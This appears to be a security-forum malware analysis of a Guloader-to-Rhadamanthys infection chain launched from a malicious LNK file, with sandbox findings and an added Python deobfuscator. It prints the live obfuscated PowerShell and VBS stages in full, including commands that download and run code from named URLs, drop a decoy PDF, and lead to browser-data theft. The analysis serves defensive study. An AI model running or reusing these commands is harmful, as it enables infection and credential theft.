This post was last edited by QVM360 on 2024-7-6 01:30

Running the LNK launches PowerShell with this command line:

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${g72p14} = $PSHOME;${*tc18kw.} = ${g72p14}[+52 -53 +1] + ${g72p14}[-11 +2] + 'A' + ${g72p14}[-66 +55];${xih.} = $([TYPE]${*tc18kw.});${*.p9nc2a.} = ${xih.}::ToString(+79 -1 -5)+${xih.}::ToString(+79 -1 -5 -4)+${xih.}::ToString(+79 +30 -10 +21);&(${*.p9nc2a.})(&(${*.p9nc2a.})(${g72p14}[+52 -53 +1]+'u'+${g72p14}[-66 +55]+${g72p14}[-61 +55]+' https://www.delpas.it/mo/qc.txt -UseBasicParsing'))
The index arithmetic pulls single characters out of $PSHOME (C:\Windows\System32\WindowsPowerShell\v1.0) to spell "ChAr", and [char]::ToString(73/69/120) gives "IEx", so the whole thing is iex(iex('Curl https://www.delpas.it/mo/qc.txt -UseBasicParsing')): it fetches qc.txt and evaluates its content. Note this URL:

https://www.delpas.it/mo/qc.txt

Its content is:
- powershell -win hidden $g72p14=iex($('[Environment]::GetExihs'''.Replace('xih','nvironmentVariable(''public'') + ''\\p9nc2a.vb')));$flol=iex($('[Environment]::GetExihs'''.Replace('xih','nvironmentVariable(''public'') + ''\\yd2.vb')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Nh5fw-Objh5fct Systh5fm.Nh5ft.Wh5fbClih5fnt).Downh9he($oulv.Replace(''j5f'',''tps://'').Replace(''r4j'', ''e''), $fz)').Replace('h5f', 'e').Replace('h9h', 'loadFil'));iex('szvbarzvb $fz'.Replace('zvb','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htj5fwww.kuthbanr4jng.com/wh/List%20of%20rr4jquirr4jd%20itr4jms%20and%20sr4jrvicr4js.pdf';getit -fz $flol -oulv 'htj5fwww.pinr4japplr4jtr4jch.ar4j/at/at.vbs';exit
This is heavily obfuscated with .Replace() chains. Once they are undone it does three things: it deletes the .lnk from the current directory, downloads a decoy PDF named "List of Required items and services.pdf" into the current directory and opens it, then downloads a VBS file (see attachment) to the %public% folder as yd2.vbs and starts it.

The VBS file in turn calls PowerShell with the following command line (the "[过滤]" token inside the listing is the forum's word-filter marker, not part of the script):
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens taplb Samlingsregeringen Brumalia Glutition240 progressions Statusordenes Nyvurderes Copyrights Homonymets folkemunden Semipiously Cemeterial undersummernes Vinifreds71 Morainal Windel Acceptilating Kompleksitet Decangular Sjuskefejlet Vinddreven Tegnebger Anlgsgartneriet Underdimensioneringens';If (${host}.CurrentCulture) {$Spicehouse249++;}Function Volplanes($Milliardren){$rebait=$Milliardren.Length-$Spicehouse249;$Ggepulveres214='SUBsTR';$Ggepulveres214+='ing';For( $Regnerable=5;$Regnerable -lt $rebait;$Regnerable+=6){$taplb+=$Milliardren.$Ggepulveres214.Invoke( $Regnerable, $Spicehouse249);}$taplb;}function Tilhre($Miltsick){ & ($Parakelia) ($Miltsick);}$tailforemost=Volplanes 'AnnotMAtiono bilcz Skr iMonstl TekslSnyd,am.com/Mat r5Acerb.Pyrro0 Lsen Aflv,(Knas,W BlreiBlavenF.inlda gadoPersowDrives brov LeonNRoupiTGoust Hjhed1Situe0E erf. Shri0Smagl; E.ga ,avneW Chy,iCircunBeded6,appe4Bende;Misch SussexRevan6Bjrn.4 Trio;Anven T.dssr rivivPu ga:Chuga1Ma.gi2smit.1 Cons. 
Comp0C,eni),onpo Ade,iGIbidieE,lasc Recek P atoSu te/Poste2 Ting0salpi1Pendr0Thyge0Ritra1Bl,ge0Overn1 ,ovs TetraFKomm.iIndicrPaleneGe,kefsinguoTe.nix Kvit/Fa,ee1Drupa2 Krig1Nonex.,agbl0Nonun ';$Transformability=Volplanes 'HindbUGre.dsSvedjeQu.ysrFodno-NonreAVelm gSo.lmeTjen,nFescetAc iv ';$progressions=Volplanes ' ProchU.klitWagont rivepFrerbs L,xi:Moonc/Forbr/UvrdiwUnisswUds.rwHerna.Analya M.nnlbilbrmB strrAnbefwRive.aP rdodbrabr.Brugsc.overononfomSuper/Nona mH.shenTilde/ajospU IntedUnfr,lSkoleiSkaangtrevrgsoloueRea,prMethasSejrs.SolbehStyrehEtablkActin>non,ehDimentTilsetDim tp PrepsGenop:Alryd/Manco/TolvmwKvikrwtaljew Sten.Nekroe antarCh nqpFlagm-Nonasr OndyoSttteyVandgaDefaclMikro-SwallcVenezra.cliofilfow Lam nGigge.overgiPinlinIvrksfHexaso C ri/ Gastm vrisn Eska/Ph,llUPendudDeciblEuropiBarnegFejlsgovermeAnch,rS,ccesOverf.Unr,fh GuilhPhospkPrint ';$Falsificere=Volplanes 'inter> Disq ';$Parakelia=Volplanes '.yophiModsteFornrx Wo,l ';$Simar='Copyrights';$Supperne = Volplanes 'Gru deHandlcG.strhPartioPara Jespe%LongiaLe chpJaspepout.td Overarem ntfrygtaInt r%Skspo\LoharVUnforiSvupss rinaiSecu tSpliceViroirFe lteF,ondsFunkt.ProgrHExcruuEmpovdm.cra unbew&Decli&Ba ks Knusee grshcSl,brh LuftoNonsh BombytRei,v ';Tilhre (Volplanes 'ca pa$NonnegKva,il Cawio GynkbEv,luaUnderlCepha: HackBTegngrForesn Haple einefCarchdSinopsKontoeApprola.erdsSapo.dKultuaLiniegTomme=Hoved(VippecRefrem S yldGensk hygri/BrankcGener Uncro$DumblSOut auDyslep licep UnavePic.irMarlinRapsoeM.use)Medal ');Tilhre (Volplanes 'nimbl$C evogDansklHu froParambCarolaRumakl,peci: PaniGOp avlSpejlu TotatDreadiafhaet El,ciUnsoloTitann.reti2S,lke4 Ambi0 W.st=Beauj$ .hiapFis.ir popuoAkkilg Nonsr [过滤]e OversRiskfsJonahi KlunoS,uirnNonarsde ik..vergsJudicp AfrelPhylliherm t Tran(Nummi$,nhinFArbejaUnhu lLandrsMikroi F ruf.uisai BgescValkyeFarror Svige .ack) Yd,r ');Tilhre (Volplanes ' B,rh[SloppNTaksieNona.t Prag.TufthSPerseeG,anerRear,vRooibi,erricApocaem croPUdtolo PrejiArbejnMagnetOvervME.erga 
,ilonc.yptaArbejgAllsweUdskirBatik] Last:Peger:GolbeSOverpe misacTransuUnpourpapyri BadetForuryDamewPSkldurligeso StratkageroBractcItenso FurelVolde ,rag=.ilms Livsf[DepraNBeda eBisubtUngdo. SpecSUndere OikocReveruCragsrKermeiI,dvitVulneyDygtiPCy,lorT,biro.ejrftKondioStillcB.ibeointralF,yenTLakkey ekrnpBedrieJe ni]Combi:D.nax: Eft,Tc gnalSafets Knud1Paste2Undul ');$progressions=$Glutition240[0];$Deliciousness= (Volplanes 'Mor.i$SkrifgSca.elFril,o Ufo,bMa era HypolA.ari: LedeL,phodnMoskgnNed liSplinnRavivgStoles Repadpekina BomrgT.anaeTr.sssUnspi=ap,esNSorg,e P,sew Chro-Imbo OdobbebParo jTvisteorgancPhaent Poit Udtr S.ackpy Henrs smaatF rreeRhizomForst.UdvikNTvrdrePe,chtHygro.Ka.beWTak feva sobOmstbClsseklKvadri Serre StilnDelirt');$Deliciousness+=$Brnefdselsdag[1];Tilhre ($Deliciousness);Tilhre (Volplanes ' Mund$ConceLKadminPie.enStudeiSelvbnGallogSemimsOverrd Prova.utopg Fejle AvansOrtho.P.ogrHKaerle Bnknaef,rgdSyllaeForr.r.renesHatch[Rumor$HieroTAd,norTioloaTandbnUndersEtablfSkaleoDeklarAfs,emThe yaT,hanbvinkliHa malRashei,ndvetgy.nay Bila]Taetd=Ombes$cho otTegnfaIdiosi,aabel vaunfU deroHjer,rpsitteDrawlm PrinoCent.sHandetsp.in ');$Benzinautomaten=Volplanes 'Kvote$,nfraLF,netnK.rsunDisiniCheninSafragNursisSkuffdChequaskygngKanoneTa nesSvvef.CamouDU baso PyntwLegalnSi ralPen.eopresuasondedKonfeF Ca,iiFor alSe,mie Silk(Par,l$Frstep UslurPenstohusmagPartirBetaleMollysTrembsSpritifeltmo .alkn CounsHarce,stile$u,uguTLokaleAdhregFo prnSublueMit.rbTombagNe,gae Gradr Tids)domne ';$Tegnebger=$Brnefdselsdag[0];Tilhre (Volplanes 'Co,li$Revolg KinglDirekoV,deobWindbaPrydelAirsc: Us aG.eoloi fgifvFortraNajadb .ryslAntise,umbl= Over(MastiTGranueChrissBurgot Fers-FantaP MuncaFilkotUngaihChurn ersk$UnderTBrn.peRter gMist.n KerneMethab Indfg StopeRrdamrnosog)Kog.i ');while (!$Givable) {Tilhre (Volplanes 'Point$Sociog GarvlMucouoc stob fremaSolinlVisse: IsceMRegi eBeb,dkSuperaDe,ignBr,kni Datas OrigeUninfrDesexeFjereno.isod ,visesta,ksSpice= Axop$S,abrtIrrearRolpeuConjueJeron ') 
;Tilhre $Benzinautomaten;Tilhre (Volplanes 'indskSPrsentMaskia oaxerByldetVi eo-VenteSTonenlRec,ge,nstneS,rvipecard Dropw4Morg, ');Tilhre (Volplanes 'Tilke$AngiagCellolSnoedo Tastb ScraaPlintlAntib:WaterGassyriMongovGall,aPreapbSkemal ucieCorme=Ju,ic(EpithTOr,aneScr,bsAu ibtFrs.o- akuuPNecroaDragntM,delhUdfor Une a$.orbeTKlar.e elefg.negrnThunde Je.nb DeligWe sheIntrorFlank) To a ') ;Tilhre (Volplanes ' I du$ArbejgPseudlFolkeoForfrb SatsaLserflSuper:PhysiBWashsrKlatmuTomaemNrhedaf.ihel,lanoiSels.aChant=Unde $BesttgOerstlUncono tippbBetdsaF.cetlIsblo:saha SKommaaStuddmsyn,elDisc,iMyalln unexgPassisStrugrMejsleEgaligThe peIffymr,lostifishsnBlencgHaanee grnsn Mats+An.if+Sple.%Fejes$kongeGWestelBesseuEnthutSjofei Slv.tUnshaiPlagioVoldgnBa,eo2Bankk4 udby0Bouch.subclcParieoYor euSpindnDepontFresk ') ;$progressions=$Glutition240[$Brumalia];}$Existimation=345476;$Basigenous=28090;Tilhre (Volplanes 'Rhodi$Tima gTastal U,mioOverwblukkeaSportlKorre:ByretH C iroCottomM,byeos.otjn SagsyFortum.nproeTryllt lekssAffal odon=Blaam RegntG T,rkeTerzitdrago-CiselC polioc emonHadjitIn ideClu.pntri,utUlydi Bev $ScogiTElimieEst ogBemocnTowbaeReleabSupergNui.oeRadiar Barr ');Tilhre (Volplanes 'Hurs,$Mis.egHeppll ,erroPeritbFllesad.gtil Traf:BadevA uldmnMicrosOpt,eeBrev.eForhnnSmiledInflueOrphesRelea Ignor=Off.e Malle[ Ce.tSLujulyMotilsFarfdtKendeeAtweemcytas.ComprCSquamoLocksnFinanv QueneTakvirMace t ,att]Cripe:Inset: ,etsFr.styrAcepho RegrmOffenB Addua F,ass .vlveDeadf6Tre.o4 Sa tSStigntAfmnsrDobbei P,lonafstag Over(Z,nur$EndoaHEksemoIn ermForedoRootsnIntroyStamfmLut.aeTyll.tStablsStat,)proto ');Tilhre (Volplanes 'snr,l$.yplagUnprel .aveoBogklb,rerfaPrecol onoc:typesCUniceeimperm BorteTota t OutleTendorAerohiPrecaaBonnilBevog Disc=Unsin Pomf [ProgrSSynkryDeafns .icrtNytteePerdem arty.Welc,TGrasseSmig,xEfte t M.df. 
s,afEVarsknTeorecDk,etoAmbigdDecimiNeutrn SiligU,ens].arts:frate: blitARispaSarbitCChazyIFrydeIKu.ti.Bonn.G Aft,eBa,ehtMudreSSva,etLagerr DissiVarefnToparg,fsko(Rnebl$RaabeASkol.nSalvas P rteAfsaleOptegnSkramdSighteDeputs Flso)Hklet ');Tilhre (Volplanes 'Reli.$ Gorgg El.clEonscoTrabebFlu da Utakl Haar:cape,P,eminu.irekrT.nnipAtmialCompeeBero.wMo,ryoromauo amtsdTum l=Blush$NeuraC WeddeVe tkm Ruteel,etmtOms re,upinrBruttisklsaaApp,ylStr p.v talsduponuunspebHa.kesIntittPrestrKrigsi Spadn Fr mgFra.t(Guldd$Gyn,nE,nvibxaphesiFr.nksLituitBuazeiTimbemDommeaOl.sttKandiiElectoMollinMoxie, Gear$FundeBOpstvaKenotsSejrsiSkarng probe Clocni nicoSte kusulfisTinge)Sko s ');Tilhre $Purplewood;"
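To make the three obfuscation layers above reproducible, here is a small Python decoder. It is an added example written for this page, not code from the original post or from the malware; the $PSHOME value is an assumption (a default 64-bit Windows install), the qc.txt inputs are copied from the listing above, and the Volplanes sample fragment is constructed from three literals in the listing that survived the forum's whitespace collapsing (the longer blobs lost double spaces when pasted, so they do not decode cleanly from this page). Volplanes() in the script takes one character at offsets 5, 11, 17, ... of each junk string; the width comes from $Spicehouse249, which is only incremented when $host.CurrentCulture exists, so in an emulator without it every decoded string is empty and the script does nothing. The decoded literals show the stage setting a Firefox User-Agent, downloading from a '>'-separated URL list into %appdata%\Visiteres.Hud with Start-Sleep 4 retries, base64-decoding it, and carving $Basigenous=28090 bytes at offset $Existimation=345476 for iex.

```python
# Added example (not from the original post or the malware authors): decoders for
# the three string-obfuscation tricks used in this chain.
import re

# Stage 1 assumption: $PSHOME on a default 64-bit Windows install.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def ps_int_expr(expr: str) -> int:
    """Evaluate a PowerShell constant like '+79 -1 -5' (a sum of signed integers)."""
    return sum(int(tok) for tok in re.findall(r"[+-]?\d+", expr))


def ps_index(s: str, expr: str) -> str:
    """Model ${var}[expr]: PowerShell negative indices count from the end, as Python's do."""
    return s[ps_int_expr(expr)]


def decode_stage1(pshome: str = PSHOME) -> dict:
    """Rebuild the words the LNK command line assembles from $PSHOME and [char]::ToString()."""
    type_name = (ps_index(pshome, "+52 -53 +1") + ps_index(pshome, "-11 +2")
                 + "A" + ps_index(pshome, "-66 +55"))
    cmdlet = "".join(chr(ps_int_expr(e))
                     for e in ("+79 -1 -5", "+79 -1 -5 -4", "+79 +30 -10 +21"))
    downloader = (ps_index(pshome, "+52 -53 +1") + "u"
                  + ps_index(pshome, "-66 +55") + ps_index(pshome, "-61 +55"))
    return {"type": type_name, "cmdlet": cmdlet, "downloader": downloader}


def decode_qc() -> dict:
    """Undo the .Replace() chains in qc.txt; inputs are copied from the listing above."""
    # '[Environment]::GetExihs''' is the string [Environment]::GetExihs' once
    # PowerShell unescapes the doubled quote; the 's' after xih completes '.vbs'.
    def env_path(name: str) -> str:
        return "[Environment]::GetExihs'".replace(
            "xih", "nvironmentVariable('public') + '\\\\" + name)

    def url(obf: str) -> str:
        return obf.replace("j5f", "tps://").replace("r4j", "e")

    webclient = ("(Nh5fw-Objh5fct Systh5fm.Nh5ft.Wh5fbClih5fnt).Downh9he"
                 .replace("h5f", "e").replace("h9h", "loadFil"))
    return {
        "stage2_path": env_path("p9nc2a.vb"),
        "vbs_path": env_path("yd2.vb"),
        "webclient": webclient,
        "launcher": "szvbarzvb".replace("zvb", "t"),
        "decoy_url": url("htj5fwww.kuthbanr4jng.com/wh/List%20of%20rr4jquirr4jd%20itr4jms%20and%20sr4jrvicr4js.pdf"),
        "vbs_url": url("htj5fwww.pinr4japplr4jtr4jch.ar4j/at/at.vbs"),
    }


def volplanes(blob: str, width: int = 1) -> str:
    """Guloader's Volplanes(): `width` chars at offsets 5, 11, 17, ... while offset < len-width.

    width is $Spicehouse249: 1 only if $host.CurrentCulture is set, otherwise 0,
    in which case every Substring(i, 0) is empty and the decoded script is blank.
    """
    return "".join(blob[i:i + width] for i in range(5, len(blob) - width, 6))


VOLPLANES_CALL = re.compile(r"Volplanes\s+'((?:[^']|'')*)'")


def decode_volplanes_calls(script: str, width: int = 1) -> list:
    """Decode every `Volplanes '<blob>'` literal in a script fragment, in order."""
    return [volplanes(m.group(1).replace("''", "'"), width)
            for m in VOLPLANES_CALL.finditer(script)]


def carve_stage(decoded: bytes, offset: int = 345476, length: int = 28090) -> bytes:
    """Final step of the script: after FromBase64String + ASCII.GetString on
    Visiteres.Hud, .substring($Existimation, $Basigenous) selects the code passed to iex."""
    return decoded[offset:offset + length]


# Constructed fragment: three literals copied from the listing above.
SAMPLE_FRAGMENT = (
    "$Transformability=Volplanes 'HindbUGre.dsSvedjeQu.ysrFodno-NonreAVelm gSo.lmeTjen,nFescetAc iv ';"
    "$Falsificere=Volplanes 'inter> Disq ';"
    "$Parakelia=Volplanes '.yophiModsteFornrx Wo,l ';"
)

if __name__ == "__main__":
    print(decode_stage1())                                   # ChAr / IEx / Curl
    print(decode_qc())
    print(decode_volplanes_calls(SAMPLE_FRAGMENT))           # ['User-Agent', '>', 'iex']
    print(decode_volplanes_calls(SAMPLE_FRAGMENT, width=0))  # ['', '', ''] when CurrentCulture is missing
```

The regex-driven decode_volplanes_calls() only handles literals passed directly to Volplanes; strings the script builds up by concatenation (the $Deliciousness += ... sequence) have to be joined first. The width=0 call is worth running once when triaging a Guloader script: it shows why a detonation host whose PowerShell host object lacks CurrentCulture sees an empty payload.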
This script carries #Guloader's characteristic code. The PowerShell process creates Visiteres.Hud (see attachment), a base64-encoded file that is probably used for thread injection; the sandbox detected the program injecting into the following processes:
- C:\WINDOWS\system32\OOBE-Maintenance.exe
- C:\WINDOWS\system32\openwith.exe
- C:\Program Files\Windows Media Player\wmplayer.exe
It connects to the C2 server:
This is a #Rhadamanthys C2 server.
The program reads the browser's user data from:
C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8

and uploads it to the C2 server.

Full execution chain:
Analysis qc.txt (MD5: FB6402D3EF1FCDD5AF327668FA8D41B4) Malicious activity - Interactive analysis ANY.RUN
Analysis yd2.vbs (MD5: D19A4C4B7BE7F5AD5187433ECE99115C) Malicious activity - Interactive analysis ANY.RUN